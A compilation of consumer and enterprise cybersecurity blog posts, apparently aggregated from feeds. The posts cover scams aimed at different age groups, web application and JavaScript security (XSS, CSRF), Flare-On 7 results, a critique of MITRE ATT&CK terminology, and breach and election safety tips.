Grandparents Fall for Help!’ Scams

Called “The Grandparent Scam,” this con usually begins with a simple, “Hi, Grandma!” from a criminal posing as the victim’s grandchild who claims to be in trouble. Then comes the ask — that the loving (and worried) Grandparent wire money for bail, airfare, a collision, or some other emergency. Some scammers have even managed to spoof the incoming caller ID to read “U.S. District Court.”

Safe Family Tips: 1) Ask the caller to prove who they are and call the child’s parent or another relative to verify the situation. 2) Never wire money, gift cards, or send cash by courier. 3) Be skeptical of “urgent” requests and tearful pleas for cash or personal information.

Tricksters Target Millennials

While it’s hard to imagine being duped by this kind of phone call, you might be surprised to learn that it’s younger people falling hardest for scams. The Federal Trade Commission reports that Millennials (20-30-year-olds) are most likely to lose money to online fraud. The top 5 scams targeting Millennials include online shopping, business imposters, government imposters, fake check scams, and romance scams.

Safe Family Tips: Be skeptical when shopping online. Cybercriminals have created countless look-a-like merchant sites to gain access to your credit card and other personal information. Confirm the seller’s physical address and phone number before you make a purchase. Consider putting security software on your family’s devices that protect against malware, viruses, and provide families with Virtual Private Network (VPN) encryption for safe shopping.

Hackers Exploit Schools, Students

With many school districts operating on a hybrid virtual and in-class education model, the digital gap between teachers and remote students has given bad actors a new channel to launch ransomware, phishing, and social engineering scams against exposed IT infrastructures. According to the FBI, “cyber actors are likely to increase targeting of K-12 schools during the COVID-19 pandemic.”

Too, a recent Microsoft Security Intelligence study found that 61 percent of the 7.7 million malware over the previous month targeted education, a number far higher than other sectors. Scams include malware attacks on e-learning platform ransomware attacks on larger districts.

Safe Family Tips: Inquire about on-site security measures in place at your child’s school. Look into software to protect your home network and personal devices against cyberattacks launched through email, school networks, or social media sites.

How’s Your Cyber Hygiene?

Your best defense against a scam — should it come via phone, email, or a website — is a solid offense. Consider boosting your cyber hygiene routine by using strong passwords, a VPN, and staying informed about the latest scams. By now, we know the bad actors online don’t discriminate based on age; they are out to steal data and dollars from anyone who lets down their guard.

The post Cruel Ghouls: New Digital Scams Target Every Age Group appeared first on McAfee Blogs.

Best Security Practices to Protect your Web Application from Future Threats

Almost all businesses nowadays use web applications for their targeted growth, but these apps’ security is mostly compromised if proper steps are not taken. During the web application development, all other features are given time and preference, but very few pay attention to the web application security they deserve. The vulnerabilities in your web application can be easily exploited by cybercriminals who always remain in search of sites with lower security protection.

Here are one of the most important security practices that you should implement to secure your web application from the most common threats:

Install SSL Certificates

One of the most effective measures to secure your web applications from cyberattacks is through encoding all the information shared on it. SSL certificates use SSL (Secure Socket Layers) or TLS (Transport Layer Security) security protocols to protect the data from the reach of cybercriminals through encryption.

If you do not activate SSL certificates on your web applications, hackers can easily read the shared information if they somehow get access to it. SSL certificates use cryptographic keys to make it impossible for the attackers to read the data.

https://lwstatic-a.akamaihd.net/kb/wp-content/uploads/2019/07/ssl-security-plan.png

The certificate authorities ensure that data transfer is encrypted throughout the communication process. Before buying an SSL certificate for your web app make sure you are purchasing it from a trustworthy SSL Authority like a ClickSSL that provides some of the most popular SSL certificates in very reasonable price.

Manage User Permissions

Wisely managing user’s permissions makes your web applications more secure than before. There would be numerous employees working in your company, and you know that not every worker needs full access to the system to perform his/her job. So, it would be best to implement the “Principle of least privilege” to limit every user’s access.

If you have granted full access permissions to everyone working in your organization, it will take a single cyber-attack by the scammers to access your entire system. So, to avoid any data breaches, you should strictly implement the least privilege principle in your firm. This may be a time-consuming process, but it will save your web app from many potential threats and malicious workers too.

Train your Employees

If you are running an organization, you should never expect that most of your employees will have a decent knowledge of current cyber security threats. Most of your staff members would have the necessary information about these scams. This may put you and your company in hot waters, as your employees with no sound knowledge of cyberattacks can quickly become the victim of hackers.

So, to protect your web application, you need to conduct proper cybersecurity training sessions for your employees. You must hire a web application security master to train all your staff about your web app and operating environment’s potential threats.

This cyber security training will help your employees independently identify and save themselves and your business from all security threats.

Hire Professional Hackers

Ethical hackers use the same tricks and techniques applied by cybercriminals to exploit your web application’s vulnerabilities. But they do this for your benefits to understand the security risks in your web app. Professional white hackers use the following techniques to test your web app’s security:

Cross-site scripting (XSS)

Man-in-the-middle (MITM) attacks

Broken authentication

Distributed Denial-of-service (DDoS) attacks

Sensitive data exposure

SQL injection

Phishing

White hat hacking

After your web app’s penetration test (Pen-testing), you would become familiar with your website’s security weaknesses that will help you improve your web application’s security.

Secure Web App during Development

This is one of the essential security steps in protecting your web apps from the reach of hackers. This technique is all about preventing your software from security issues that occur during the development lifecycle. For this, you need to hire developers who have full knowledge of all the prevalent security problems and prevent malicious code in the actual program of the web application.

And if they find any malicious activity during the development lifecycle, they should identify and eliminate that issue.

Regular Updates

With multiple network security threats, it is essential to release regular updates for your web apps security. Outdated software lacks recent security features and can easily be manipulated by malicious hackers. Depending on your web app’s infrastructure, you need to update your web app’s components. Keeping your web application up to date will protect it from the known attacks by hackers.

update key

Keep Monitoring your App Regularly

To stay on the safe side, you should regularly keep looking for security vulnerabilities in your web app. It would help if you used different techniques for testing your mobile app security level. You can use dynamic and static application security testing tools to monitor your web app’s performance and security level. Regular testing of your system will help you know the vulnerabilities and implement new protection schemes to protect your web application.

Backup all Data

With an increase in the number of cyberattacks in today’s world, your web app data remains under threat every time. Hackers may get full access to your web app data that will put you in serious trouble. To avoid such a situation, you need to store all your web app data at another location. It may be a good idea to replicate the archives of all your information in multiple places to protect you from heavy losses in case your primary backup location is damaged or compromised.

The 3-2-1 backup rule diagram

Employ Security Experts

You need to invest more in security services to protect your web application from cybercriminals. Hiring security experts is a wise step towards improving your web app security. A security specialist or security service company uses specialized tools to monitor the security level of your website. The scanning results show the vulnerabilities present in your site. They then help you implement new security techniques to protect your web applications.

Before hiring anyone for security improvements, do complete research and check the individual’s reputation or the firm to validate their competence and authenticity.

Conclusion

Cybercriminals are finding new ways to take advantage of the weaknesses in your web applications. They always remain searching for websites that have poor web application security to launch an attack on them. To protect your web applications, you need to stay updated about all the known security threats. For organizations, dealing with malicious attacks is dependent on all employees. If any of your workers make a mistake in handling the potential cyberattack, it can put all your firm’s data in danger.

Cybersecurity protection starts with training your employees and implementing the right security techniques to secure your web applications. Implementing the above-listed best security practices will keep your web applications safe from all types of cyberattacks.

The post Best Security Practices to Protect your Web Application from Future Threats appeared first on CyberDB.

Everything You Need to Know About JavaScript Security

These days, JavaScript is one of the more well-known and established programming languages around. JavaScript is mostly found in the code of dynamic web pages that allow for extended JavaScript functionalities. These functionalities include useful operations such as interactivity, tracking user activities, and form submission or validation. Although JavaScript is generally regarded as a reasonably safe coding language, many users are growing skeptical about certain aspects of JavaScript security.

Many well-known JavaScript vulnerabilities can affect both the server-side and client-side. Malicious hackers can utilize these vulnerabilities by traversing a number of open paths through your application. When utilizing JavaScript in your application, it is critical to evaluate all JavaScript Security threats seriously and  implement an open source vulnerability scanner to find these threats. 

This article will detail two of the most severe potential JavaScript security vulnerabilities and how to deal with them appropriately. 

Cross-Site Scripting (XSS) Attacks: What Are They?

One of the most common browser-side vulnerabilities is called “Cross-Site Scripting.” Also known as XSS, Cross-Site Scripting attacks happen in client-side scripting languages such as JavaScript or HTML and manipulate an internet security weak spot. When performing an XSS attack, hackers can use legitimate web applications to perform malicious tasks by harnessing a vulnerability.  

XSS attacks are, unfortunately, all too common and can result in the theft of one’s data or identity. These attacks can also result in the spread of the virus across the network by gaining control of the user’s browser. 

Hackers and malicious actors are able to manipulate insecurities on a website. This attack is performed by injecting JavaScript code into the parameters of the site, then using this exploit to gain access to the user’s data. Essentially, this code allows the hacker to transfer ownership of the victim’s session ID to that of the hacker to take control of the browser. 

How can it be prevented? 

There are several ways to ensure that your JavaScript is safe and secure:

  • First, you must filter all input as it arrives. This means that whenever a user provides input, there needs to be a strict filter to compare it to what is generally assumed to be valid input.
  • Utilize appropriate and effective response headers. In order to prevent an XSS attack from HTTP from responses that are supposed to contain any HTML, it is possible to use X-Content-Type-Options or Content-Type option in the headers. These headers will make sure that the browser is responding in the way that it was intended to and is not being exploited. 
  • You should also encode your data when it is being outputted. When a user’s data is outputted in an HTTP response, the output should be encoded to prevent it from being identified as active content.
  • Lastly, be sure to use a Content Security Policy. If you have a CSP set up to the right set of rules, you will be able to prevent the browser from executing any unwanted operations or any JavaScript code that may come from an untrusted source.

Cross-Site Request Forgery (CSRF) Attacks: What Are They?

An XSRF or CSRF is a well-known attack in which the hacker attempts to impersonate or completely take over the identity of the victim by hijacking their active session cookie. This attack is possible when the target site attempts to authenticate a request by only using cookies, which will allow the hacker to gain access or hijack the functional cookies, to appear to be a legitimate user. 

This attack can be very harmful to the victim and can lead to fraud, account tampering, or data theft. The most common targets are popular web applications such as social media, web interfaces, online banking, and in-browser email clients. 

Let us use the online banking situation as an example. 

Most banking websites use active session cookies in order to authenticate any user requests. These cookies then follow the order of events to log into the banking account, enter the valid details needed, then click on the transfer button. 

When a user logs into the account, the banking website will store a session cookie that it will refer back to in order to authorize the transactions. 

The Hack

In order to initiate the hack itself, the hacker would need to create a website that looks legitimate but has an underlying agenda. For this example, we will use a blogging website. If the user logs in and wants to create a new blog post, the malicious application running in the background will then send a “GET” request out to the banking website. This hack is only useful when the user is also logged into the banking site. If they are, the session tokens will be active and in place.

The hacker will then manipulate the “GET” request in order to operate the banking site stealthily. Once the user clicks on the button to add a blog post, they will also unwittingly transfer money to the hacker’s account.

How can it be prevented?

  • You must always utilize SameSite Cookie Attribution when working with session cookies. 
  • The site must also verify both the Referrer Header or Origin.
  • Try to implement any user interaction that is based on protection, especially for highly sensitive procedures like banking. User interaction based on protection should include a re-authentication (usually a password), a CAPTCHA, or even a one-time token. These steps can be strong defenses against a CSRF attack if they are used correctly. 

JavaScript security is a topic that is not often talked about; however, it is highly essential to many professions. Learning to execute JavaScript safely and correctly is not something that most people are able to learn overnight. 

When you are looking to test or upgrade your JavaScript security, it is highly recommended to seek the help of a certified professional or cyber security specialist. These professionals will give you a better and more detailed understanding of your security risks and what actions you can take to correct them. Taking the security of your website seriously is no easy task and requires constant maintenance. However, if you take precautions, your users will be able to browse knowing they are using a safe and secure site. 

The post Everything You Need to Know About JavaScript Security appeared first on CyberDB.

Trick or Treat: Avoid These Spooky Threats This Halloween

Halloween scams

Trick or Treat: Avoid These Spooky Threats This Halloween

Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

Zombie Malware Hides in the Shadows

Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

Cybercriminals Leave Credit Card Users Spellbound

A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess.  To pull off this attack, they plated a credit card skimmer onto the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

Why These Cyberspooks Are Emerging

While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

How to Stay Protected

Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

Beware of emails from unknown senders

Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

Review your accounts

Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

Use a comprehensive security solution

Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

Flare-On 7 Challenge Solutions

We are thrilled to announce the conclusion of the seventh annual Flare-On challenge. This year proved to be the most difficult challenge we’ve produced, with the lowest rate of finishers. This year’s winners are truly the elite of the elite! Lucky for them, all 260 winners will receive this cyberpunk metal key.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. fidler – Nick Harbour (@nickharbour)
  2. garbage – Jon Erickson
  3. Wednesday – Blaine Stancill (@MalwareMechanic)
  4. report – Moritz Raabe (@m_r_tz)
  5. TKApp – Moritz Raabe (@m_r_tz)
  6. CodeIt – Mike Hunhoff (@mehunhoff)
  7. re_crowd – Chris Gardner, Moritz Raabe, Blaine Stancill
  8. Aardvark – Jacob Thompson
  9. crackinstaller – Paul Tarter (@Hefrpidge)
  10. break – Chris Gardner
  11. Rabbit Hole – Sandor Nemes (@sandornemes)

This year’s Flare-On challenge was the first to feature a live public scoreboard, so players could track their progress and the progress of previous Flare-On challenge champions. Despite this increased data at your fingertips, we are still going to bring you even more stats. As of 11:00am ET, participation was near record setting levels at 5,648 players registered. 3,574 of those players finished at least one challenge.

The U.S. reclaimed the top spot for total finishers with 22. Singapore was once again in second place, but in uncontested first place per capita, with one Flare-On finisher for every 296,000 living persons in Singapore. This is the first year we have included a per capita finishers by country chart, and we did it to highlight just what a remarkable concentration of talent exists in some corners of the world. Consistent top finisher Russia took third place, and a growing player base in Germany and Israel came into full bloom this year, with those countries edging out other frequent top five countries such as China, India and Vietnam.

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11

MITRE ATT&CK Tactics Are Not Tactics



Just what are "tactics"?

Introduction


MITRE ATT&CK is a great resource, but something about it has bothered me since I first heard about it several years ago. It's a minor point, but I wanted to document it in case it confuses anyone else.

The MITRE ATT&CK Design and Philosophy document from March 2020 says the following:

At a high-level, ATT&CK is a behavioral model that consists of the following core components:

• Tactics, denoting short-term, tactical adversary goals during an attack;
• Techniques, describing the means by which adversaries achieve tactical goals;
• Sub-techniques, describing more specific means by which adversaries achieve tactical goals at a lower level than techniques; and
• Documented adversary usage of techniques, their procedures, and other metadata.

My concern is with MITRE's definition of "tactics" as "short-term, tactical adversary goals during an attack," which is oddly recursive.

The key word in the tactics definition is goals. According to MITRE, "tactics" are "goals."

Examples of ATT&CK Tactics


ATT&CK lists the following as "Enterprise Tactics":

MITRE ATT&CK "Tactics," https://attack.mitre.org/tactics/enterprise/

Looking at this list, the first 11 items could indeed be seen as goals. The last item, Impact, is not a goal. That item is an artifact of trying to shoehorn more information into the ATT&CK structure. That's not my primary concern though.

Military Theory and Definitions


As a service academy graduate who had to sit through many lectures on military theory, and who participated in small unit exercises, the idea of tactics as "goals" does not make any sense.

I'd like to share three resources that offer a different perspective on tactics. Although all three are military, my argument does not depend on that association.

The DOD Dictionary of Military and Associated Terms defines tactics as "the employment and ordered arrangement of forces in relation to each other. See also procedures; techniques. (CJCSM 5120.01)" (emphasis added)

In his book On Tactics, B. A. Friedman defines tactics as "the use of military forces to achieve victory over opposing enemy forces over the short term." (emphasis added)

Dr. Martin van Creveld, scholar and author from the military strategy world, wrote the excellent Encyclopedia Britannica entry on tactics. His article includes the following:

"Tactics, in warfare, the art and science of fighting battles on land, on sea, and in the air. It is concerned with the approach to combat; the disposition of troops and other personalities; the use made of various arms, ships, or aircraft; and the execution of movements for attack or defense...

The word tactics originates in the Greek taxis, meaning order, arrangement, or disposition -- including the kind of disposition in which armed formations used to enter and fight battles. From this, the Greek historian Xenophon derived the term tactica, the art of drawing up soldiers in array. Likewise, the Tactica, an early 10th-century handbook said to have been written under the supervision of the Byzantine emperor Leo VI the Wise, dealt with formations as well as weapons and the ways of fighting with them.

The term tactics fell into disuse during the European Middle Ages. It reappeared only toward the end of the 17th century, when “Tacticks” was used by the English encyclopaedist John Harris to mean 'the Art of Disposing any Number of Men into a proposed form of Battle...'"

From these three examples, it is clear that tactics are about use and disposition of forces or capabilities during engagements. Goals are entirely different. Tactics are the methods by which leaders achieve goals. 

How Did This Happen?


I was not a fly on the wall when the MITRE team designed ATT&CK. Perhaps the MITRE team fixated on the phrase"tactics, techniques, and procedures," or "TTPs," again derived from military examples, when they were designing ATT&CK? TTPs became hot during the 2000s as incident responders drew with military experience drew on that language when developing concepts like indicators of compromise. That fixation might have led MITRE to use "tactics" for their top-level structure. 

It would have made more sense for MITRE to have just said "goal" or "objective," but "GTP" isn't recognized by the digital defender world.

It's Not Just the Military


Some readers might think "ATT&CK isn't a military tool, so your military examples don't apply." I use the military references to show that the word tactic does have military origins, like the word "strategy," from the Greek Strategos or strategus, plural strategoi, (Greek: στρατηγός, pl. στρατηγοί; Doric Greek: στραταγός, stratagos; meaning "army leader"). 

That said, I would be surprised to see the word tactics used as "goals" anywhere else. For example, none of these examples from the non-military world involve tactics as goals:

This Harvard Business Review article defines tactics as "the day-to-day and month-to-month decisions required to manage a business." 

This guide for ice hockey coaches mentions tactics like "give and go’s, crossing attacks, cycling the puck, chipping the puck to space and overlapping."

The guide for small business marketing lists tactics like advertising, grass-roots efforts, trade shows, website optimization, and email and social marketing.

In the civilian world, tactics are how leaders achieve goals or objectives.

Conclusion


In the big picture, it doesn't matter that much to ATT&CK content that MITRE uses the term "tactics" when it really means "goals." 

However, I wrote this article because the ATT&CK design and philosophy emphasizes a common language, e.g., ATT&CK "succinctly organizes adversary tactics and techniques along with providing a common language used across security disciplines."

If we want to share a common language, it's important that we recognize that the ATT&CK use of the term "tactics" is an anomaly. Perhaps a future edition will change the terminology, but I doubt it given how entrenched it is at this point.

Update: This Tweet from Matt Brady made this point:

"Agreed - for example, supply chain compromise is a tactic used for initial access, whereas software supply chain compromise (ShadowHammer) is a specific technique."

This Week in Security News: Watering Hole Campaign Operation Earth Kitsune Spying on Users’ Systems and Fancy Bear Imposters Are on a Hacking Extortion Spree

week in security

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a watering hole campaign Trend Micro dubbed ‘Operation Earth Kitsune’ that is spying on users’ systems through compromised websites. Also, read about how APT groups are threatening DDoS attacks against victims if they don’t send them bitcoin.

Read on:

Fancy Bear Imposters Are on a Hacking Extortion Spree

Radware recently published extortion notes that were sent to a variety of companies globally. The senders purport to be from the North Korean government hackers Lazarus Group, or APT38, and Russian state-backed hackers Fancy Bear, or APT28. The notes threaten that if the target doesn’t send bitcoin, powerful distributed denial of service (DDoS) attacks will be launched against the victim. Robert McArdle, Trend Micro’s director of our Forward-Looking Threat Research (FTR) team, comments on DDoS as an extortion method.

A Ride on Taiwan’s Self-Driving Bus

The self-driving bus is now being tested on the streets of downtown Taipei and more autonomous buses are being deployed in other places, including Germany, Japan and Canada. Since connected cars are still a relatively new technology, the dangers of these vehicles are unknown and mostly speculated. In this article, Trend Micro discusses potential security implications of these connected vehicles.

 U.S. Charges Russian Intelligence Officers in Major Cyberattacks

This week, the Justice Department unsealed charges accusing six Russian military intelligence officers of an aggressive worldwide hacking campaign that caused mass disruption and cost billions of dollars by attacking targets like a French presidential election, the electricity grid in Ukraine and the opening ceremony of the 2018 Winter Olympics.

 Operation Earth Kitsune: Tracking SLUB’s Current Operations

A watering hole campaign that Trend Micro has dubbed as Operation Earth Kitsune is spying on users’ systems through compromised websites. Using SLUB and two new malware variants, the attacks exploit vulnerabilities including those of Google Chrome and Internet Explorer.

Cybersecurity Company Finds Hacker Selling Info on 186 Million U.S. Voters

Trustwave says it found a hacker selling personally identifying information of more than 200 million Americans, including the voter registration data of 186 million. The revelation underscored how vulnerable Americans are to email targeting by criminals and foreign adversaries, even as U.S. officials announced that Iran and Russia had obtained voter registration data and email addresses with an eye toward interfering in the 2020 election.

Future Imperfect

In 2012, Trend Micro, the International Cyber Security Protection Alliance (ICSPA) and Europol’s European Cyber Crime Centre (EC3) collaborated on a white paper that imagined the technological advances of the coming 8 years, the societal and behavioral changes they may bring and the opportunities for malfeasance they could present. As we enter the 2020s, we now have the opportunity to objectively review the project against a number of success factors.

WordPress Deploys Forced Security Update for Dangerous Bug in Popular Plugin

WordPress sites running Loginizer, one of today’s most popular WordPress plugins with an install base of over one million sites, were forcibly updated this week to Loginizer version 1.6.4. This version contained a security fix for a dangerous SQL injection bug that could have allowed hackers to take over WordPress sites running older versions of the Loginizer plugin.

Just Leave That Docker API on the Front Porch, No One Will Steal It

Recently, a new type of Linux malware named “DOKI” has been discovered exploiting publicly accessible Docker API’s hosted in all major cloud providers. The manner in which threat actors are gaining access to container environments is a previously discovered technique, but the DOKI malware is something that has not been documented until now.

Adobe Fixes 16 Critical Code-Execution Bugs Across Portfolio

Adobe has released 18 out-of-band security patches in 10 different software packages, including fixes for critical vulnerabilities that stretch across its product suite. Two of the issues are out-of-bounds read flaws, (CVE-2020-24409, CVE-2020-24410); one is an out-of-bounds write bug (CVE-2020-24411). Tran Van Khang, working with Trend Micro Zero Day Initiative, is credited for the discoveries.

US Treasury Department Ban on Ransomware Payments Puts Victims in Tough Position

This month, the US Treasury Department’s Office of Foreign Assets Control (OFAC) warned organizations making ransomware payments that they risk violating economic sanctions imposed by the government against cybercriminal groups or state-sponsored hackers. The advisory has the potential to disrupt the ransomware monetization model, but also puts victims, their insurers and incident response providers in a tough situation.

What are your thoughts on the sanctions imposed by the government against cybercriminal groups or state-sponsored hackers?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Watering Hole Campaign Operation Earth Kitsune Spying on Users’ Systems and Fancy Bear Imposters Are on a Hacking Extortion Spree appeared first on .

Safeguarding Critical Infrastructure: NIST Releases Draft Cybersecurity Guidance, Develops GPS-Free Backup for Timing Systems

Taking another step toward strengthening the nation’s critical infrastructure, the National Institute of Standards and Technology (NIST) has drafted guidelines for applying its Cybersecurity Framework to critical technologies such as the Global Positioning System (GPS) that use positioning, navigation and timing (PNT) data. Part of a larger NIST effort to implement a recent Executive Order to safeguard systems that rely on PNT data, these cybersecurity guidelines accompany recent NIST efforts to provide and test a resilient timekeeping signal that is independent of GPS. Formally titled the

Affected by a Data Breach? Here Are Five Security Steps You Should Take

credit card breach

Five Tips to Secure Your Credit Card Data From This Recent Data Breach

Users share their personal information with companies for multiple reasons. Whether they’re checking into a hotel room, using a credit card to make a purchase at their favorite food spot, or collecting rewards points at a local coffee shop, consumers give companies more access to data than they may realize. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

Dickey’s BBQ Breach

Just this week, for example, cybercriminals were found online to be selling a batch of over three million credit card records – all from cards that were used at Dickey’s BBQ establishments over the past 13-15 months. Researchers stated that Dickey’s payment systems were likely compromised by card-stealing malware, with the highest exposure in California and Arizona. What’s more, financial institutions that have been working with the researchers stated that they have already observed a significant amount of fraud carried out with these cards.

Staying Secure in Light of Data Breaches

If you think you were affected by this breach, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a recent data breach, or just want to take extra precautions:

Keep an eye on your bank account

One of the most effective ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it

Place a fraud alert

If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.

Freeze your credit

Freezing your credit will make it impossible for criminals to take out loans or open new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).

Consider using identity theft protection

A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

Expand your security toolbox

To use your credit card safely online to make purchases, add both a VPN and password manager into your toolbox of security solutions. A VPN keeps your shopping experience private, while a password manager helps you keep track of and protect all your online accounts. And both, luckily, come included in McAfee Total Protection.

Stay Updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Affected by a Data Breach? Here Are Five Security Steps You Should Take appeared first on McAfee Blogs.

Making a Difference: Global Payments

 

The PCI Security Standards Council (PCI SSC) recently announced the nomination period for the next PCI SSC Board of Advisors. The Board of Advisors represents PCI SSC Participating Organizations worldwide to ensure global industry involvement in the development of PCI Security Standards. As strategic partners, they bring industry, geographical and technical insight to PCI Council plans and projects. In this post, we talk with 2018 - 2020 PCI SSC Board of Advisor Member Stacy Hughes, Chief Information Security Officer, at Global Payments about the role of the PCI SSC Board of Advisors in shaping payment security globally.

NICE Webinar: Addressing the Cybersecurity Talent Gap at Scale – Introducing Learning and Employment Records

The PowerPoint slides used during this webinar can be downloaded here. Download the Continuing Education Units form. Speakers: Rick Torres President and CEO National Student Clearinghouse Alex Kaplan Global Leader, Blockchain and AI for Industry Credentials IBM Talent and Transformation Darin R. Hobbs Director of Academic Records & Credentials Western Governors University Frank C. Cicio Jr. CEO and Founder iQ4 Synopsis: We are living in a skills-based economy where employers are seeking ways for learners (employees, job seekers, and students) to provide evidence of their skills or competencies

Election 2020: Make Sure Your Voice is Heard with These Tips

U.S. Elections

Election 2020: Make Sure Your Voice is Heard with These Tips & Best Practices

Last year, India exercised one of the greatest feats of democracy, trying to enable over 900 million people to vote in their general election. My mom lives in India, and I remember talking with her about their ambitious plans to reach every voter, no matter how remote their location. They sent poll workers deep into the jungle, and across rivers, to reach just a handful of voters. The result: a record turnout at over 67%.

In the United States, we too have an opportunity to fulfill our civic duties, with various options available to us to make sure our votes are heard. While many people choosing to mail in their votes for the very first time, there’s also a lot of confusion around election rules and security, not to mention a flood of misinformation online to be wary of.

Here at McAfee, we want to help you vote with confidence in this critical election. That’s why we’ve put together a number of tools, resources, and best practices to empower voters. Our hope is that every voice can be heard.

Demystifying Mail-In Voting

Let’s start with some questions you may have around mail-in voting, since twice as many people plan to mail in their ballots this year, compared to 2016. Of course, with the COVID-19 pandemic still active, it’s understandable that many people, especially the vulnerable, would prefer to mail their ballot, rather than go to a polling station. I personally got my mail-in ballot and am ready to mail it this week. If you haven’t decided on how to vote, you still have time to decide.

To get accurate information on mail-in voting, go directly to your state and local websites for guidance, including how to fill out your ballot, and when to turn it in. Rules vary state to state, but one thing we do know is that mail-in voting has proven to be a reliable and secure way to have your voice heard.

It’s great to see long lines to vote in some states already. If you are still concerned about election security and online scams, my colleague Judith Bitterli has written a great guide for locating reliable sources and protecting your vote (Key tip: always look for a .gov domain name).

She also has advice for making sure that your mail-in ballot counts.

Safe Election Surfing

When looking online for election resources, be aware that scammers and cybercriminals are always trying to take advantage of trending topics to misdirect users to dangerous websites and links. In fact, the FBI recently warned that bad actors have been setting up fake election websites, in an attempt to steal voters’ personal information, or get them to download dangerous files.

The Bureau suggests that you visit the U.S. Election Assistance Commission website for accurate information in a variety of languages. If you are concerned about clicking on risky links during the election or year-round, one smart action you can take is to install McAfee WebAdvisor, which warns you of risky sites before you click on them.

Although it can be tempting to believe election information posted on social media, especially by friends and family members, know that business school MIT Sloan says “fake news is at its peak” during online presidential years, and even your loved ones can be fooled.

But whether information is clickbait, or legitimate, it can still be posted to risky websites designed to steal your information, or download malware. That’s why McAfee released a new social media protection tool as part of WebAdvisor. Using color codes, the tool shows you which links are safe or risky right in your social feed, and can be used across all six major social media platforms. This makes it easier to avoid dangerous links posted on social channels. Given the increase in phishing we’ve observed in the last few months across PC and mobile platforms, a comprehensive security solution like McAfee® Total Protection can help keep your personal information and devices safe.

In-Person Voting

If you still plan to vote in person, or even better, volunteer as a poll worker, make sure that you have reliable information on voting times and locations. You’ll probably also want to look into local rules on health and safety precautions, so you are well prepared.

False and misleading information about COVID 19 has been swirling since the start of the pandemic, so it’s important that you seek verified information about the virus. Here again are some great tips from Judith on how to keep COVID misinformation from suppressing your vote.

 Exercise Your Right

Now that you know how to sidestep misinformation, find trusted resources, and plan your vote — either through the mail or in person— I hope that you will exercise your right, with confidence.

 

The post Election 2020: Make Sure Your Voice is Heard with These Tips appeared first on McAfee Blogs.

Cybersecurity 101: How to Protect Yourself from Hackers

The internet has changed a lot of things; some for the better and others for the worst. Everything that we use in our homes, from mobile devices to the Internet of Thing (IoT) products, rely on the internet. The extensive use of these products have the potential to erode our privacy. When it comes to privacy, it is under attack from all sides. Whether we realize it or not, hackers are always trying to gain information about us so that they can control our lives. In order to make your devices, online identity, and everything that you do online more secure, you have to follow a few things. In this article, I am going to highlight five cybersecurity tips that you need to know.

Install an Antivirus

